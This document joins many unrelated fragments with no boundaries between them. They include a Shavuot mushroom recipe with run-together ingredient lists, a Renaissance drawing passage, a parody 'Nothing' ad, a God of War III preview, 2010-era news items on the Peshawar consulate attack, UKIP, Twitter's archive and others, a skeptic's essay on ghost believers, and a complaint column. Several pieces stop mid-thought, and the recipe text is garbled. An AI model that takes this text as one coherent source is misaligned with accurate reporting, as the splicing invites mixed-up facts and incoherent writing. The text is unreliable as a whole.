Milk , therefore , represents the number of days Moses spent on Mount Sinai receiving the Ten Commandments .
Others connect the description of Mount Sinai in Psalms ( 68:15 ) , , meaning “ many peaks ” to the word , cheese .
Scholars have also connected the tradition to other locales and ethnic groups and their spring harvest festivals .
Dairy dishes were the norm , perhaps because of cheese ’s production season .
There is asaying that the Israelites ’ religiousness had changed after receiving the Torah at Mount Sinai .
Following the Revelation , they refused to eat the meat that had been prepared without regarding the laws of kashrut .
The hungry Israelites ate a dairy meal rather than preparing new kosher meat .
Eating a modest dairy meal was considered appropriate upon receiving the Torah , which required humility .
The recipe below offers a modern twist on the millennia - old traditional of eating dairy products on Shavuot .
There ’s even a touch of honey , to reflect the land of Israel ’s two most famous flavors !
Courtesy of Nadav Camp , head chef at BBB : Borgos Burger Bar600 gr. champignon mushrooms100 gr. butter300 gr. chopped onions2 chopped garlic cloves ( 1/4 ) cup5 gr. salt5 gr. white pepper200 gr. goat cheese2 tsp. date honey 2 tsp. Dijon mustard1 kg. peppers1⁄2 kg. cherry tomatoes 1⁄4 cup vinegar70 gr. of garlic3 ⁄4 cup brown sugar1 tsp. of sweet paprika1 .
Remove the mushroom stems and chop them .
2 . Sauté the chopped onions , garlic and mushroom stems in a pan with the butter .
Seasoning with salt and pepper .
3 .
Put the sautéd vegetables into a food processor .
Add the bread crumbs .
Grind until the mixture is pasty .
4 .
For the filling : Mix the goat cheese , date honey and mustard in a bowl .
5 .
Pour the cheese into the bellies of the mushrooms .
6 . Spread the bread crumb and mushroom stem cream on the mushrooms .
Deep fry .1 . In a pan , sauté the peppers until they are soft .
2 . Add the remaining ingredients .
3 . Cook for 20 minutes on low heat .
Pepper mayonnaise1 ⁄2 kg. mayonnaise200 gr. pepper sauce mixGreen SaladBaby greensGraded carrotsA bit of carrotsMix with vinaigrette : Juice from half a lemon1 / 4 cup of olive oilA pinch of saltA pinch of sugar
Now , for the first time , an artist could plan a complex composition in detail before he even picked up his brush .
Perugino , for example , used pen and ink in his compositional study for his painting of the Adoration of the Magi , both because the medium allowed his hand to move over the page faster than it could using chalk , and because he was n’t worried about achieving a high degree of finish .
You can almost feel his pen flying over the page as he sketches in dozens of tiny figures and animals , a fantastic palace and a distant landscape .
Only on close examination ( or by reading the label ) do you realise that this tour de force is n’t quite as spontaneous as you first imagined – because the artist ’s hand was guided by faint under - drawing in lead pencil .
NOTHING YOU CAN BELIEVE IN
We believe in nothing , and we think you should too .
We have our workers doing nothing around the clock , finding new ways to package nothing , new problems to confront ( in our big 32 page manual which is offered free with every purchase ) , or doing literally nothing just to waste time .
Right now we are drastically understaffed , but we are n't in a hurry because we want to make sure we get nothing right .
NOTHING IS BIG " Nothing is bigger than cyberspace , the Internet , and the NFL site on the world wide web . " - Microsoft .
People all over the world are talking about nothing .
It does n't matter what language you speak or even if you can't speak .
Nothing 's the same everywhere you go .
Almost the entire universe is made up of nothing .
Philosophers think and talk about nothing until they die .
" It 's " that important !
THE CUSTOMER IS #1
We know that you work hard for your money , so we are working overtime to develop our customer image .
We 'll do nothing to help you right from the start .
If you do n't like our service , we 'll do nothing until we get it right .
Anyone can offer nothing , but we 'll deliver .
Others may stop at nothing to get a satisfied customer , but to us nothing is just the beginning .
ALL THAT YOU EVER WANTED IN A CONCEPT ...
AND LESS
We have nothing to do , nothing to eat , nothing to wear , nothing to say , and many other concepts .
We are pleased to announce that nothing is available at this time !
We are so excited about nothing that we can't wait to tell everyone about " it " .
Order Today !
Wondering what to get the
man who has everything ?
Nothing seems good enough .
GIVE THE GIFT OF NOTHING !
* Nothing Virtual Networking is a division of negligible AND unobtrusive ( an adjective )
Last week , I was lucky enough to be invited to Sony ’s God of War III event here in Hollywood .
At the event , under the light of those cool fake torches that blow around paper to look like fire , various members of the development team showed off the first 30 minutes of the upcoming PlayStation 3 title , in addition to answering some questions about the highly ( highly ! ) anticipated game .
After a presentation from Game Director Stig Asmussen projecting some game footage on a huge screen , all the members of the press were led into a huge room full of stations where we could actually play the final build of God of War III .
Well , the first 30 minutes of the final build , anyway .
And I am here to tell you that the first 30 minutes of God of War III are the best first 30 minutes of any videogame I have ever played .
You really are not ready for this game .
Seriously .
I am on such a high from the extraordinary experience of playing God of War III , that I am ready to take you through a detailed walkthrough of every visceral , out - of - control second of the awesome opening .
Hit the jump for more hyperbole than you can handle .
God of War III ( PS3 )
Developer : Sony Santa Monica Studio
Publisher : Sony Computer Entertainment
To be released : March 16 , 2010
[ Disclaimer :
This section of the game includes the sequence already covered by Nick Chester back in January , but it expands into much more .
If it starts off familiar , keep reading .
Trust me . ]
After hitting start on the now - classic , half - of - Kratos ’s head title screen , God of War III starts , literally , exactly where God of War II left off .
With the goal of attacking Mt. Olympus and the gods themselves , Kratos finds himself on the back of Gaia , as she and her fellow titans are scaling the side of a massive cliff .
In a gorgeous cutscene that is rendered in real - time ( you are not ready ! ) , Zeus and a few select gods ( boss battles later in the game , perhaps ? ) stand at the edge of the grand temple and observe the titans climbing Mt. Olympus .
Immediately , Zeus orders some of his guards to jump from the temple onto the back of the titans in hope of stalling their progress .
At this point the playable game begins .
The camera swoops down from the heavens onto the moving , stone - and tree - covered arm of Gaia .
On it , Kratos is perched , massive sword in hand , ready to do battle .
For fans of the series , the immediate good news is that God of War III on the PlayStation 3 controls and feels exactly like the God of War games of the past .
And that is most definitely a good thing .
Without any hesitation , I was performing killer combos on the hordes of guards , blood and experience orbs flying everywhere .
While the initial tutorial battle with a handful of guards commences , the action happening on - screen all around Kratos is out of control .
Since you are on the back of a huge , moving titan , the ground under Kratos is constantly moving .
In the background , all of Gaia ’s body realistically sways just out of focus .
Even cooler , the other titans scattered around the cliffs can be seen ascending the mountain .
Really , there is so much eye candy to stare at that it is almost too much to handle .
After defeating all the guards , Kratos moves forward by raising a tree that has bent over Gaia ’s arm , blocking his path .
At this point a new cutscene begins .
Back in Zeus ’s temple , the god Poseidon steps forward and dives off the top of the mountain .
As he falls , he thrusts his entire body into a climbing titan , knocking it and Poseidon into the water below .
After a huge splash , the water turns into a giant whirlpool .
And then it happens .
From the whirlpool , a huge water snake with the head of a horse and crazy crab legs shoots out .
The water snake grabs a hold of Gaia , pulling her down off the mountain .
Gaia holds on , refusing to let go .
Immediately after grabbing Gaia , multiple water snakes emerge from the whirlpool , each one taking hold of a different titan .
Then the action switches back to Kratos and the player takes control again .
It ’s hard to explain without seeing it in action , but you really have no idea how good the graphics are in this upcoming sequence .
As Kratos moves around on Gaia ’s arm , Poseidon ’s water snakes are swirling around everywhere in the background .
The camera spins around , showing all the attacking titans while Kratos battles multiple incoming enemies .
It is ridiculously epic .
As he moves forward , Gaia ’s arm suddenly shifts and one of the water snakes jumps in front of Kratos , wrapping itself around Gaia ’s arm .
Enter the first boss battle .
Well , the first stage of the first boss battle ( again , you are not ready ) .
At this point Kratos must attack the huge water snake , dodging attacks from both his horse head and crazy crab arms .
Once his energy is depleted , something amazingly cool happens .
The water snake shifts and twists Gaia ’s arm .
With this , the entire screen spins around , throwing Kratos underneath Gaia ’s arm .
Hanging on for dear life , Kratos must now battle the coiled water snake while hanging from under Gaia ’s constantly moving arm .
It is OUT OF CONTROL COOL !
This dance continues in many different positions .
As the arm spins around , Kratos finds himself alternating between standing straight , hanging below , and even clutching to the side of Gaia ’s arm .
After a long battle , Kratos gets the water snake ’s energy low enough to perform his legendary context - sensitive QTE finishing move .
Here is a good time to mention an improvement that God of War III implements that helps things dramatically !
In the two previous God of War games , QTE symbols would be in the middle of the screen , displaying whatever button needs to be quickly pressed on the PlayStation controller .
It worked great , but sometimes the reaction time was so short it was hard to hit the buttons quickly enough .
In God of War III , the on - screen prompts actually appear in a section of the screen related to where the corresponding buttons are placed on the actual PlayStation controller .
Meaning : the “ circle ” symbol will appear on the right side of the screen , the “ X ” on the bottom , the “ square ” on the left , and so on and so on .
This sounds really minor , but it helps so much and allows you to not miss the incredible visuals by concentrating too hard on one area of the screen .
It ’s a brilliant ( if subtle ) improvement .
Once he finishes off the water snake , Kratos is thrown to the side of Mt. Olympus .
What follows is a lengthy level full of platforming , fighting , and puzzle - solving : all the classic elements of a great God of War game .
The twist is , while traversing through the inner and outer workings of Mt. Olympus , Kratos has to deal with battling the many different water snakes at different points .
The entire sequence is very similar to the opening Colossus of Rhodes battle in God of War II ... but much more visually stunning ( you are not ready ! ) .
After making it through the level ( which includes a gorgeous sidetrack through Gaia ’s heart ) , Kratos is confronted with fighting one final water snake .
But this is no ordinary water snake .
As the snake coils around Gaia , trying its best to pull the stubborn , strong Gaia off the cliff , it reveals itself to be only a small piece of the main boss : the god Poseidon .
That ’s right ; all the water snakes are only the tentacles of Poseidon , who has grown enormous in size .
Kratos stands in front of Poseidon -- all in real - time and completely playable , mind you -- as the titans move all around him .
Gaia struggles to stay on the cliff and screams in agony as the water tentacles start to rip her apart .
The battle with Poseidon begins and , I will tell right now , it is one of the most ridiculously over - the - top , awesomely designed boss battles I have ever played .
Basically , Kratos has to fight Poseidon on many different stages and levels .
There are sections where he has to swing his sword and blades while dodging attacks ; there are sections where Kratos has to jump around as Gaia moves and twists below him ; there are even sections where Kratos swings all around Poseidon with his grappling hook , flying through the sky like he has wings ( it is unbelievably cool ) , all of this ending in a wildly satisfying finishing move .
But that is not the best of it .
Right before I was asked to stop playing in fear of revealing too much , the coolest part of the opening sequence presented itself .
Once the giant Poseidon is defeated , he becomes small again and Kratos knocks him to his knees on the cliffs of Olympus .
At this point , Kratos basically beats Poseidon to death using a series of QTE moves .
But here is the kicker : all of this happens FROM POSEIDON ’S POV .
The uncomfortably long beating sequence is shot entirely through the eyes of Poseidon .
It is out of control .
Like , seriously out of control .
And even though I have explained everything in detail , I will keep the very last QTE move you perform secret .
You need to experience it yourself without it being spoiled to fully experience its impact .
It is just as clever as it is shockingly violent .
So , yeah .
That was it .
After defeating Poseidon , my play time came to an end and I walked away unbelievably impressed .
The look on face for the entire 30 minutes was priceless .
My mouth was hanging open the entire time .
I think I even let out a few audible gasps and “ woahs . ”
At first glance , God of War III does nothing new .
It really feels exactly like the other two games in the series .
But the core mechanics in God of War are so great , changing too much would be a bad idea .
But that does n’t mean everything is the same !
Obviously , the game is a huge step up visually from the previous games , displaying the best graphics I have ever seen in a videogame -- yup , even better than Uncharted 2 .
And the few new mechanics I saw implemented in the first 30 minutes of the game are original enough to feel fresh , but not too different to feel awkward .
Basically , the first 30 minutes I played were perfect .
Absolutely perfect .
The graphics were jaw - dropping ; the gameplay was solid and already addictive ; and there were more “ holy sh*t ! ” moments in the opening sequence than some games have in their entireties .
Obviously I recommend God of War III to anyone who owns a PlayStation 3 .
If you own a PS3 , there is no excuse to not pick this up when it is released on March 16th .
Heck , even if you do n’t own a PS3 , get the game anyway !
I bet even holding the box would be a cool experience .
Even though I only got to play the first 30 minutes of the game , I can say with confidence that God of War III is going to offer an unforgettable experience -- easily one of the best this generation .
You are not ready .
Major League Baseball ’s players union told agents in an e-mail message on Friday that the trading card company Upper Deck was experiencing financial difficulty and had not paid a large number of players money it owed them .
The union said it was working with Upper Deck to ensure that the players would be paid .
The union strongly advised players not to return to Upper Deck any autographs they had signed for the company or to enter into any new agreements with the company until the payments were made .
The e-mail message was from Evan Kaplan , the union ’s director for trading cards and collectibles , and was sent to all player agents .
A person who received the e-mail provided a copy of it to The New York Times on the condition that the person not be identified .
A spokesman for the union declined to comment .
A spokesman for Upper Deck did not respond to an e-mail message .
Chelsea have paved the way for Joe Cole 's departure from Stamford Bridge by formalising their interest in the Liverpool midfielder Yossi Benayoun , with the Israeli confident a transfer can be completed over the next week .
An opening bid of £ 4 m is understood to have been knocked back by the Merseyside club , though they have offered Chelsea encouragement that an improved offer of about £ 6 m will secure the 30 - year - old .
Carlo Ancelotti is keen to sign the Israel international after talks with Cole 's representative over a new deal reached an impasse , with the midfielder now expected to leave under freedom of contract next month .
Tottenham Hotspur , with a potential Champions League campaign ahead , remain favourites to secure Cole under the Bosman ruling , ending his seven - year stay in south - west London since a £ 6.6 m move from West Ham United .
The 28 - year - old had hoped to gain an increase on his weekly wage to £ 100,000 , but Chelsea are set upon restructuring financially and did not offer him improved terms .
Cole has not had a regular first ‑team place at the Double winners under Ancelotti , and Benayoun will have to accept life as a squad player as well .
His own fortunes at Liverpool dipped somewhat towards the end of last season to mirror those of the team , with his relationship with the manager , Rafael Benítez , steadily deteriorating to the point where Liverpool effectively sanctioned his departure in the closed season .
The move is surprising given that Benayoun , who had also attracted tentative interest from his former club West Ham United and Spurs , is two years older than Cole in a squad that is already considered to be ageing , though he does have pedigree in the Premier League .
The Israeli anticipates the completion of his move to Stamford Bridge over the next few days having indicated last week while on international duty that Chelsea were keen to sign him .
" Ancelotti wants me for next season and now everything depends on Liverpool , " he said .
" Chelsea will have to pay some £ 6 m , but I believe that , in the end , I 'll be moving there . "
Islamabad , Pakistan ( CNN ) --
A terrorist attack near the U.S. Consulate in Peshawar , Pakistan , killed two consulate security guards and at least six others Monday , authorities said .
The two consulate employees who died were Pakistani , the U.S. Embassy in Islamabad said , and " a number of others were seriously wounded . "
At least eight people were killed in all , a government official said .
All U.S. citizens were accounted for , and some had minor injuries , State Department spokesman P.J. Crowley said .
The coordinated attack involved a vehicle suicide bomb and attackers who tried to enter the consulate by using grenades and weapons fire , the U.S. Embassy said in a statement .
The blasts in the capital of the North West Frontier Province came hours after a suicide attack killed at least 30 people and wounded 50 others in another part of the province .
The Pakistani Taliban claimed responsibility for both attacks .
In a phone call to CNN , Azam Tariq , spokesman for Tehrik - i- Taliban Pakistan , said the group was behind the attacks in Peshawar and Dir .
The U.S. Embassy , in its statement , said the two attacks reflect " the terrorists ' desperation as they are rejected by people throughout Pakistan . "
Peshawar is about 75 miles ( 120 kilometers ) from Islamabad , the country 's capital .
Bashir Ahmad Bilour , a senior provincial minister , told reporters at the scene that several militants came in two vehicles .
The first vehicle exploded near a security checkpoint , and gunmen in the second car opened fire .
The dead included two Pakistani security personnel working for the U.S. Consulate , one policeman , two civilians and three unidentified bodies , said Karim Khan , a senior police official in Peshawar .
" They were well - organized .
They were well - equipped , " he said of the attackers .
The three explosions went off within a span of 15 minutes in the area of Saddar and Hayatabad Avenue , near the American consulate and the Peshawar headquarters of Pakistan 's intelligence agency , which was the target of a deadly car bomb attack in November .
The North West Frontier Province is rife with Islamic extremists and has been the site of recent clashes between Pakistani security forces and militants .
Monday 's earlier suicide attack took place at a rally for the province 's ruling Awami National Party in Timargarah in the lower Dir district , said lawmaker Mehmood Zeb Khan .
Hundreds of the participants had gathered for a rally to change the name of the province to Khyber Pakhtunkhwa .
The bomber walked into the government building where the meeting was going on and blew himself up , said provincial spokesman Mian Iftikhar Hussain .
The province was given its current name during the British colonial rule .
The party , which heads a coalition government in the province , wants the area 's name to reflect its majority Pashtun population .
A bill to amend the constitution in support of the name change was expected to be introduced in parliament on Monday .
Journalist Nasir Habib and CNN's Elise Labott , Paula Newton , and Jill Dougherty contributed to this report .
A powerful green laser beam penetrated the cockpit of a jet getting ready to land at JFK International Airport , and it was so bright the pilot had to shield his eyes , authorities said .
The pilot told air traffic controllers that he had to use a sun visor to shield his eyes after the the light shone into the cockpit of the JetBlue plane at 7:45 p.m .
The light appeared to come from the shoreline and was pointed directly at the cock [ pit , the pilot said .
The plane , flying from Portland to JFK , landed safely without incident .
Police are investigating .
Depuis le 5 avril , plusieurs clients non dégroupés de Free se plaignent des restrictions mises en place par le FAI sur son réseau et qui rendent délicate , voire impossible , l’utilisation de certaines applications comme la VoIP ou le P2P .
VoIP , P2P , jeux en réseau et SSH ne sont pas les bienvenus
publicité
Le site Freenews se fait notamment l’écho du bridage opéré par Free sur certains ports et protocoles sur des plages horaires définies .
Les messages indignés de freenautes sur différents forums d’utilisateurs , comme celui de l’ADUF et grenouille.com , confirment l’information .
D’après ces témoignages , ce sont les ports « non-standards » ( hors port 80 ) qui sont les premiers impactés .
Pour les clients de Free , cela se traduit par de sérieuses difficultés dans l’utilisation d’applications de types jeux en ligne ( comme World of Warcraft ) , SSH , VoIP et P2P .
La lecture de vidéos en streaming serait également concernée .
Si pour certains freenautes , le bridage du réseau intervient dès 10 heures du matin , il est le plus handicapant entre 18h et minuit , c’est - à- dire aux heures de pointe .
Selon le site Freenews , ces règles de gestion du réseau seraient la réponse de Free à une saturation de son réseau .
Malgré les questions adressées au support de Free par les internautes , le FAI n’a toujours pas apporté de réponse officielle .
En plein débat sur la neutralité du Net , sur lequel le PDG de Free s’est récemment exprimé à la demande de l ’Arcep , ces restrictions ne passent pas inaperçues .
As a young man , Vernon Lott thought he could very well be the next great American poet .
But then he got out of the habit of writing , stumbled years later upon on a box of his old poetry in his mom ’s basement , and realized :
This stuff is horrible .
Instead of shoving the poems back into the box , however , and fleeing the basement in shame , he decided to show his work to a bunch of famous writers , among them George Saunders , David Sedaris , Margaret Atwood , and Nick Flynn , and ask their opinions .
Their reactions to his poetry , and their thoughts on what differentiates good writing from bad , is the subject of Lott 's documentary , " Bad Writing , " which is currently on the festival circuit and seeking distribution .
Here 's the trailer :
Bad Writing - Official Trailer from Morris Hill Pictures on Vimeo .
Lott 's project got me thinking : what 's so scary about bad writing , anyway ?
Part of the answer is that it seems like it can happen to anyone , anytime .
As Margaret Atwood says in the trailer , “ There ’s no rule that says you get steadily better . ”
Another part of the answer is that most people — even a writer 's friends , and especially a writer 's peers — have no qualms about mocking bad writing .
In a recent article in Salon , Laura Miller explores the history of literary mocking :
In the early 20th century , dinner party guests would entertain each other by reciting passages from the alliteration - heavy works of one Amanda McKittrick Ros ( 1860 - 1939 ) , regarded by experts as the greatest bad novelist of all time .
In Oxford , C.S. Lewis , J.R.R.
Tolkien and their friends competed to see who could read aloud from Ros ' books the longest before cracking up .
She also writes about Steve Almond ’s Bad Poetry Corner , on The Rumpus , where Almond posts unfortunate poems written in his youth .
Some favorite lines of mine include : “ Hell is you , Sartre , and whatever sour beaujelais the sommelier brought ” and “ Behind these lay the landscape after passion / hidden by the buttery fog of hope . ”
Maybe Almond 's on to something : maybe the only way for a writer to avoid bad writing in the future is to revisit writing from the past and analyze where it goes wrong .
This , at least , seems to have worked for George Saunders , who says in Lott 's documentary :
As a guest on a recent radio program , I took calls from people who ’d had some ghostly experience .
It ’s not true that such callers are always trying to challenge the evil skeptic : “ I saw my grandfather ’s ghost at the foot of my bed , explain that , Mr. Skeptic ! ”
In this case , most of the callers ( I think ) were genuinely hoping for some insight .
Although I certainly could n’t speculate about what their experiences might have been , I was at least able to avoid making some common mistakes that often cost skeptics their credibility .
First , you ’re not going to convince a ghost believer by saying “ We have no evidence that ghosts exist , nor is there any plausible hypothesis by which they might exist . ”
No ghost believer in history has ever heard that , said “ Aaahh , ” smacked themselves in the forehead , turned over a new leaf , and gone forth with a new perspective on reality .
Logically , you have just as much evidence that ghosts do n’t exist as they have that ghosts do exist .
So it ’s a weak argument .
Thus , no good can come from starting off by contradicting their belief .
The only thing it accomplishes is to establish an antagonistic tone .
Presumably , if they ’re comfortable with a belief in ghosts , they ’re also comfortable with a belief in other types of supernatural beings .
Most people are religious , so this opens up the door of plausibility to angels and demons .
Most people have some belief in psychic powers at some level , so this permits the introduction of mind projections , telepathy , and so on .
We always want to look for common ground , rather than for points of conflict .
One thing that nearly everyone can agree upon is that none of the above phenomenon have any scientifically established known properties .
There is no accepted , established body temperature for demons .
There is no firm set of proven behaviors for a ghost .
We cannot capture an astrally traveling being , perform a blood test , and prove that it ’s an astral traveler .
No supernatural being has a single known , accepted , concrete property .
Most believers probably have their own general idea of what a ghost might look like and do , but everyone will acknowledge that different witnesses report different experiences .
So when someone expresses their belief that something they saw was a ghost , it ’s perfectly reasonable to ask how they were able to rule out other possibilities .
If you saw the apparition of your grandfather standing at the foot of your bed , how were you able to identify it as your grandfather ’s ghost , rather than a demon trying to trick you ?
A psychic somewhere putting that vision into your head ?
Vibrational energy from your grandfather persisting around some of his belongings ?
A projection from your own subconsciousness ?
An angel of a yet - to - be - born person , using some image from your mind as a way to manifest itself ?
We do n’t know what properties any of these things might have , thus there ’s no way you can logically compare the details of your experience to them to determine what it was you saw .
The spirit of your grandfather might be the most emotionally comforting option , but it might be important to find out if a demon is trying to trick you ; so the mind should be open to that possibility too .
The more intelligent someone is , the more likely they may be to intellectually realize that there are other possibilities .
A person who acknowledges that they do not know the cause of their experience is closer to the truth than a person who insists upon one specific , unsupportable conclusion .
Of course , this same logic applies to those who see something in the sky and identify it as an alien spacecraft .
Consider the other possibilities : A vehicle from an unknown population of beings who live at the bottom of the ocean , or a craft from a subterranean race .
Those are two possibilities that do n’t require the assumption of the problems of interstellar travel having been solved .
Perhaps the Earth even has its own race of beings who live in the sky , possessing all kinds of unfathomable aeronautical secrets .
What would be the properties of one of their vehicles , and what would be the properties of an extraterrestrial spacecraft ?
How were you able to match up your observation to one , and to exclude the other ?
You can’t , since neither has any known properties ; and so the only right answer is “ I do n’t know what it was . ”
Notably , at no time have I advocated telling the person that they ’re wrong , or that they misinterpreted what they saw , or that they imagined anything .
Maybe that ’s what happened , but I would n’t have any way to know that .
I expect that in nearly every honestly reported case , the person did see something , even if was something mundane that for some reason manifested itself in a spectacular way .
I find that introducing the suggestion that they were wrong or imagined something simply causes antagonism , and rarely leads to enlightenment .
One need not abandon one ’s belief in ghosts or UFOs to take an important step on the journey to critical thinking .
If a person can acknowledge , for the first time , that “ I do n’t know , therefore I know ” fails the test of logic , they ’ve improved their ability to interpret our world .
Imagining what they ’ll learn next is an exciting prospect indeed .
( PhysOrg.com ) --
Apple has filed a patent application for electronic video spectacles that will allow wearers to watch films in 3D on the inside of the glasses .
Fans have already nicknamed the gadget iSpecs .
Users would attach their iPhone , iPod , or other device to the spectacles , which have a special lens that can split the image into two frames — one for each eye — and then project the image onto the spectacles .
The two images would create a stereoscopic effect since they would appear to have been taken from slightly different angles , and this would simulate 3D .
According to the patent application ( number 20100079356 ) the images would be equivalent to high definition in quality , and sensors inside the spectacles would detect the precise location of the wearer ’s eyes to ensure the image is projected at exactly the right place and is comfortable to watch .
The device could be controlled by the wearer ’s head movements , such as nodding or head shaking , or by voice control .
Sound would be provided by earphones fitted into the device .
To enhance the viewing experience , the spectacles could even vibrate in response to content such as explosions .
The spectacles would also incorporate a small camera and infrared sensors embedded in the frames to stream video of the surroundings to a smaller screen in the glasses if anyone approached or tried to gain their attention while they were watching the film .
The aim of this system is to make people feel more comfortable about wearing the glasses in public , such as during plane , train , or bus trips .
There are already a few video glasses that can be plugged into an iPod to allow viewers to watch films , but none offer 3 - D viewing or high - quality images .
Another drawback of the previous gadgets is that wearers are unable to see what is happening around them , which makes them reluctant to wear them in public .
Some have suspected the patent application is a hoax since news of it was published on the Web on April 1st , but the US Patent and Trademark Office is unlikely to be involved in a hoax and the application was filed in late 2008 .
Apple never comments on patent applications .
Explore further Active Shutter 3D Technology for HDTV
© 2010 PhysOrg.com
Almost three years after the original Mass Effect was released , Legendary Pictures has confirmed that it is now working on a movie adaptation of the franchise .
Previous work from Legendary Pictures includes “ The Dark Knight ” , “ 300 ” , “ Watchmen ” , and the recently released “ Clash of the Titans . ” Additional staff attached to the project include Bioware co-founders Dr. Ray Muzyka Dr. Gregory Zeschuk , who will fulfill the role of executive producers .
Additional producers include Avi and Ari Arad , known for “ Iron Man ” , “ The Incredible Hulk ” , and more upcoming game - to - movie adaptations such as inFAMOUS and Uncharted : Drake ’s Fortune .
Mark Protosevich , a screenwriter known for his work on “ I am Legend ” and the upcoming Marvel Comic - adaptation “ Thor ” , is currently in talks with Legendary Pictures .
Legendary Pictures has confirmed that the project is still in very early stages of development .
UKIP asks voters in Somerset to back the Tories
UKIP leader Lord Pearson wrote to the Mid Somerset News and Media group
The leader of UKIP has written to a newspaper group in Somerset urging voters to support the Conservatives rather than his party 's candidates .
Lord Pearson said constituents should back the Tory candidates in Wells , Somerton and Frome , and Taunton Deane .
The party has asked its candidate in Wells , Jake Baynes , to stand down , but he has so far refused .
UKIP have a policy of supporting eurosceptics from other parties , which they choose not to stand against .
The party 's candidate in Taunton Deane , Tony McIntyre , said last night that he had not been told to step aside , and knew nothing about the open letter to Mid Somerset News and Media until he was contacted by the BBC .
' Betrayal ' Mr Baynes is standing in Wells against Tory eurosceptic David Heathcoat - Amory .
Speaking earlier this month , Mr Baynes said he disagreed with the policy that UKIP should not contest Westminster seats against other genuinely eurosceptic candidates .
" To stand down would be a betrayal ... it probably has ruffled a few feathers , but it 'll be water off a duck 's back at the end of the day , " he said .
Lord Pearson has admitted there has been some " disagreement " with Mr Baynes , but that he would not force him to stand down .
Mr Heathcoat - Amory has said he did not believe the number of people voting for him would be affected by whether or not Mr Baynes stood for election .
The other candidates standing in Wells are Richard Boyce , British National Party ; Chris Briton , Green ; Andy Merryfield , Labour ; and Tessa Munt , Liberal Democrat .
Taunton Deane 's other candidates are Jeremy Browne , Liberal Democrat ; Mark Formosa , Conservative ; and Martin Jevon , Labour .
The full list of candidates in Somerton and Frome , is Barry Harding , UK Independence Party ; David Heath , Liberal Democrats ; David Oakensen , Labour ; Annunziata Rees- Mogg , Conservative ; Niall Warry , Independent Leave - the - EU Alliance .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Ten billion Twitter messages take up little storage space : about five terabytes of data .
( A two - terabyte hard drive can be found for less than $ 150 . )
And Twitter says the archive will be a bit smaller when it is sent to the library .
Before transferring it , the company will remove the messages of users who opted to designate their account “ protected , ” so that only people who obtain their explicit permission can follow them .
Image Credit ... Christophe Vorlet
A Twitter user can also elect to use a pseudonym and not share any personally identifying information .
Twitter does not add identity tags that match its users to real people .
Each message is accompanied by some tidbits of supplemental information , like the number of followers that the author had at the time and how many users the author was following .
While Mr. Cohen said it would be useful for a historian to know who the followers and the followed are , this information is not included in the Tweet itself .
But there ’s nothing private about who follows whom among users of Twitter ’s unprotected , public accounts .
This information is displayed both at Twitter ’s own site and in applications developed by third parties whom Twitter welcomes to tap its database .
Alexander Macgillivray , Twitter ’s general counsel , said , “ From the beginning , Twitter has been a public and open service . ”
Twitter ’s privacy policy states : “ Our services are primarily designed to help you share information with the world .
Most of the information you provide to us is information you are asking us to make public . ”
Mr. Macgillivray added , “ That ’s why , when we were revising our privacy policy , we toyed with the idea of calling it our ‘ public policy . ’ ” He said the company would have done so but California law required that it have a “ privacy policy ” labeled as such .
PRINCETON , NJ -- Tea
Party supporters skew right politically ; but demographically , they are generally representative of the public at large .
That 's the finding of a USA Today / Gallup poll conducted March 26 - 28 , in which 28 % of U.S. adults call themselves supporters of the Tea Party movement .
Tea Party supporters are decidedly Republican and conservative in their leanings .
Also , compared with average Americans , supporters are slightly more likely to be male and less likely to be lower - income .
In several other respects , however -- their age , educational background , employment status , and race -- Tea Partiers are quite representative of the public at large .
A Uniformly Negative Reaction to Health Bill
Over the past year , Tea Party movement activists -- originally kindled by grass - roots opposition to the economic stimulus bill and taxpayer bailouts of homeowners -- came out strongly against the Democrats ' national healthcare reform plans .
That stance is evident in the latest USA Today / Gallup poll , in which 87 % of Tea Party supporters -- versus 50 % of all Americans -- say they consider passage of healthcare reform a bad thing .
While opposition to the healthcare bill is perhaps the most distinctive characteristic of Tea Party supporters in the new poll , their views on abortion are also notable .
Nearly two - thirds consider themselves " pro-life " on the abortion issue , compared with 46 % of all national adults .
More generally , a separate question included in the March 26 - 28 poll showed that 37 % of Americans view the Tea Party movement favorably and 40 % unfavorably , with the remainder expressing no opinion .
Predictably , Republicans and conservatives are most likely to have favorable opinions .
Survey Methods
Results are based on telephone interviews with 1,033 national adults , aged 18 and older , conducted March 26 - 28 , 2010 .
For results based on the total sample of national adults , one can say with 95 % confidence that the maximum margin of sampling error is ±4 percentage points .
Interviews are conducted with respondents on land - line telephones ( for respondents with a land - line telephone ) and cellular phones ( for respondents who are cell - phone only ) .
In addition to sampling error , question wording and practical difficulties in conducting surveys can introduce error or bias into the findings of public opinion polls .
P. C. Vey
Complaint Box Fit to Be Tied ?
Send your tales of ire and indignation — no more than 500 words , please — to : metropolitan@nytimes.com .
Where was I on the day that “ hihowareya ” became one long word devoid of meaning ?
I must be asked at least 10 times a day how I am , but I have yet to find one person who actually wants to know .
This drives me absolutely crazy .
I had not realized how much the pointlessness of this much - repeated phrase annoyed me until last summer , when I came upon a lady on the street who was walking with her head down .
As we approached each other , she suddenly looked up and asked “ Hihowareya ? ” I was pleasantly surprised by this sudden inquiry about my well - being .
But before my brain could conjure up an answer , she had walked right on by .
Shortly thereafter I was practically accosted by a twentysomething fashion industry hopeful after I staggered in the front door of a clothing store with three heavy shopping bags and a wet umbrella , which I was attempting to shake out without impaling a fellow shopper .
“ Hihowareya ? ” she enthusiastically asked before returning to her task of refolding sweaters , oblivious to the fact that I was rather encumbered and in need of a hand .
Since then , I ’ve seen old people in doctors ’ offices barely able to make it up to the receptionist area , having this pain and that pain , only to be received with a placid “ Hihowareya ? ” by a receptionist whose head is buried in her appointment book .
Most of these folks answered back , “ Fine , how are you ? ”
This makes no sense to me .
They are in a doctor ’s office .
Again , where was I when “ Fine , how are you ? ” became the automatic response to “ Hihowareya ” ?
Sometimes I try a surprise response like , “ I ’m great since the police did n’t find me , ” or a lengthy one like , “ Well , I was O.K. , until I got on the train and spilled my coffee , but thankfully the man sitting next to me offered me his napkin which . … ”
By the time I finish I am usually having a conversation with myself .
I have also tried to beat folks to the punch .
Once a receptionist smiled and opened her mouth , but before that four - word jumble could come out , I enthusiastically said , “ Hi ! ” This is what I felt like saying to her ; no more and no less .
Yet her response , quick as a wink , was : “ Fine , thank you .
How are you ? ”
Clearly it had not occurred to her that I would be so bold as to actually omit the “ howareya ? ” — something I now do all the time .
I make it a point not to ask people how they are unless I really want to know and am willing to take the time to listen to what they have to say .
And when people say to me , “ Hihowareya ? ” I smile but do n’t answer , because chances are they really do n’t care .
